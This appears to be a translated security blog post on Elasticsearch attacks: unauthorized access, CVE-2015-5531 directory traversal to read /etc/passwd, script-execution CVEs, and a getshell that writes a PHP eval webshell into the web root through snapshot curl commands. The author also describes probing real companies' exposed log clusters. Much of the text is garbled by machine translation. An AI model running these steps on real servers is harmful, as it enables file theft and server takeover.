Attack Big Data Application Analysis (I)
0x01 Preface
With the advent of the big data era, more and more big data technologies have been gradually applied to actual production. However, as a security personnel, our focus must be on security, what are the security problems faced by the big data environment? After turning over this case, many people on wooyun have already raised this issue, but I found that there is no systematic arrangement. Here I will make a paper, sort out the vulnerability categories in this area and some issues I have encountered, and make an exploratory summary. I hope to share with you to broaden your thinking.
0x02 Big Data Technology Introduction
Here, I would like to give a brief introduction to some big data technologies to help some friends who do not know much about this aspect.
Hadoop: the basic architecture of the distributed system, which consists of HDFS and MapReduce. HDFS (Distributed File Storage System) is used to store a large amount of data on multiple devices, and has a certain mechanism to ensure its integrity and Disaster Tolerance, mapReduce provides a programming model through simple Mapper and Reducer abstraction, which can be concurrently deployed on an unreliable cluster consisting of hundreds of PCs on dozens of platforms, process a large number of datasets in a distributed manner.
Apache Saprk: a new generation of big data processing engine that provides distributed memory abstraction to support working sets of applications.
Hive: HDFS-based Data Warehouse. All data is stored in the file system.
Zookeeper: ZooKeeper is an Open Source Distributed Application Coordination Service. It provides functions such as configuration maintenance, Name Service, distributed synchronization, and group service.
NoSQL databases: including common redis, mongodb, memcache, hbase, and Neo4j databases, mainly non-relational databases.
ELK: Elasticsearch + logstash + kibana, an open-source log collection and analysis platform.
Because big data involves a huge range of applications, and the related technologies are even more vast, the author is also stepping into the big data circle for a short time and has a limited understanding, if you have other comments, you may wish to give suggestions.
0x03 Elasticsearch Vulnerability
As mentioned above, ELK is an open source log collection and analysis platform (Elasticsearch + logstash + kibana). ElasticSearch is a Lucene-based search server. It provides a distributed full-text search engine with multi-user capabilities, based on RESTful web interfaces. Elasticsearch is developed in Java and released as an open source code under Apache license terms. It is a popular enterprise-level search engine. Designed for cloud computing, it can achieve real-time search, stable, reliable, fast, and easy to install and use. In this article, we will focus on some security problems in Elasticsearch.
1. Unauthorized Access
Unauthorized access is probably one of the most serious security problems currently faced by elasticsearch. A considerable number of enterprises place them directly on the public network without any access restrictions, as a result, attackers can directly access a lot of internal information. Some time ago, I found that a large cloud vendor in China has streaked its security product log cluster to the public network. I wanted to use the opportunity to penetrate the cluster, this actually reflects a problem, that is, the security of big data applications is not yet paid enough attention to. For example, this problem exists in large manufacturers that appeal, let alone other manufacturers, what does unauthorized access of elasticsearch look like?
As shown in, elasticsearch's default open port is 9200. I set up an environment locally and the direct access effect is roughly as follows:
We can see the version number, build date, lucene version, and other information of ela. But is there any software application? No. Here, we need to familiarize ourselves with some basic elasticsearch knowledge, with a Chinese translation of the Elasticsearch authoritative guide http://es.xiaoleilu.com/index.html.
Unlike traditional database storage methods, Elasticsearch stores data in different ways, such as nodes, indexes, shards, and replicas. In addition, it also has a rich plug-in library, to facilitate visualized data operations. The following uses the head plug-in as an example. The usual access path is http: // localhost: 9200/_ plugin/head.
This plug-in conveniently displays some Elasticsearch functions and parameters.
The information in the upper-right corner shows a lot of current status information about Elasticsearch. You can simply understand what it means. In addition, you can also add, query, modify, and delete these indexes.
Of course, the most important thing is that we can see all the data and field formats in the cluster. Elasticsearch is mostly used to store logs, which usually involves some physical paths and backend addresses, data Packet account password, IP address, and so on, which will be quite helpful for our subsequent penetration. Of course, many enterprises directly store user information in Elasticsearch, I don't need to mention this kind of danger. Here is a picture of the actual penetration situation.
This is a log cluster of an online lending platform, clearly visible server types, website physical paths, user access records, IP addresses, access devices, browsers, and other information are not fully displayed because there are too many fields, in addition, the number of enterprises dedicated to this log cluster is usually large, and the data volume is usually millions or even tens of millions.
If this head plug-in is not available, isn't it possible to perform these operations? Obviously, it is impossible. Elasticsearch can complete all the functions in the head plug-in by sending data packets. For example, we want to add an index named dept, which contains the type of employee, in this type, the data with id 32 contains a field named empname and its value is emp32. We only need to send such a request to complete the addition:
Curl-XPUT 'HTTP: // localhost: 9200/dept/employee/32'-d' {"empname": "emp32 "}'
Similarly, if you want to view this data, you only need to access
Http: // localhost: 9200/dept/employee/32
This is a simple example. All related operations can be completed using similar requests. Of course, I just mentioned a head plug-in here. The plug-in Library of Elasticsearch is actually quite rich, for example, if the _ river plug-in is installed, you can directly view the connection configuration information of the database.
We can use shodan to check the number of Elasticsearch instances that are open to the outside world.
Shodan shows that more than 9200 of hosts have opened port, and the number of other service applications on this port is quite small, throwing away some possible influencing factors, it is estimated that around of Elasticsearch service access is unauthorized worldwide.
Ii. Directory Traversal
The vulnerability number for this vulnerability is CVE-2015-5531, a column Directory Vulnerability that broke out last year, we look at the vulnerability description:
The cause of this problem is that Elasticsearch does not determine the type of the backup snapshot. As a result, attackers can construct malicious file names to form directory traversal, affecting version 1.0-1.6.
Method of exploits:
(1) create a data warehouse test
Curl-XPUT http: // 127.0.0.1: 9200/_ snapshot/test-d'
{
"Type": "fs ",
"Settings ":{
"Location": "/tmp/test"
}
}'
(2) create another data warehouse, test2, which is directed to the snapshot-backdata directory. However, the snapshot backup file format of Elasticsearch is in the format of snapshot-xxx.
Curl-XPUT http: // 127.0.0.1: 9200/_ snapshot/test2-d'
{
"Type": "fs ",
"Settings ":{
"Location": "/tmp/test/snapshot-backdata"
}
}'
(3) In fact, snapshot-backdata is taken as a backup snapshot of the test warehouse. When Elasticsearch finds that it is a directory, it will continue to read the contents in the directory, in this case, we construct .. /.. /.. /.. /.. malicious file names such as/etc/passwd allow Elasticsearch to recursively read the file content to form directory traversal. Compound queries in the head plug-in can also easily implement these functions.
Iii. Command Execution
Elasticsearch has seen several cases of code execution vulnerabilities, such as the CVE-2014-3120 Of the year before, last year's more famous CVE-2015-1427, both of which use its search function to support script syntax for command execution. For the CVE-2015-1427 wooyun knowledge base to have a more detailed analysis of the vulnerability.
Here To put it simply, after the outbreak of the CVE-2014-3120, Elasticsearch for the search script language support from MVEL to Groovy, but also added the sandbox, but because the sandbox filtering is not strict, as a result, attackers can bypass and execute commands. The principle is not hard, so it takes a lot of effort to bypass. 4. Getshell
This getshell is very interesting. Currently, the Chinese analysis is only available in the director's blog. Should it be the director's 0day? This problem has been fixed after version 1.6.
The use of this method involves the following steps:
(1) create a malicious index that contains Trojans
Curl-XPOST http: // localhost: 9200/test. php/test. php/1-d'
{
"Eval ($ _ POST [chr (97)]);?> ":" Test"
}'
(2) create a file warehouse
Curl-XDELETE http: // localhost: 9200/_ snapshot/test. php
(3) direct the Warehouse backup file directory to the web application directory
Curl-XPUT 'HTTP: // localhost: 9200/_ snapshot/test. php'-d '{
"Type": "fs ",
"Settings ":{
"Location": "/data/httpd/htdocs/default ",
"Compress": false
}
}'
(4) introduce the index snapshot with Trojan horse to the warehouse directory
Curl-XPUT "http: // localhost: 9200/_ snapshot/test. php/test. php"-d '{
"Indices": "test. php ",
"Ignore_unavailable": "true ",
"Include_global_state": false
}'
0x04 conclusion
This article mainly introduces four types of Elasticsearch attacks, but these vulnerabilities have been fixed in addition to unauthorized access. Big data security is still a strange field for many security researchers, therefore, the number of vulnerabilities exposed is relatively small, and the importance of big data application security is relatively low. However, with the gradual development of big data applications, I believe more practitioners will be involved in the research in this field.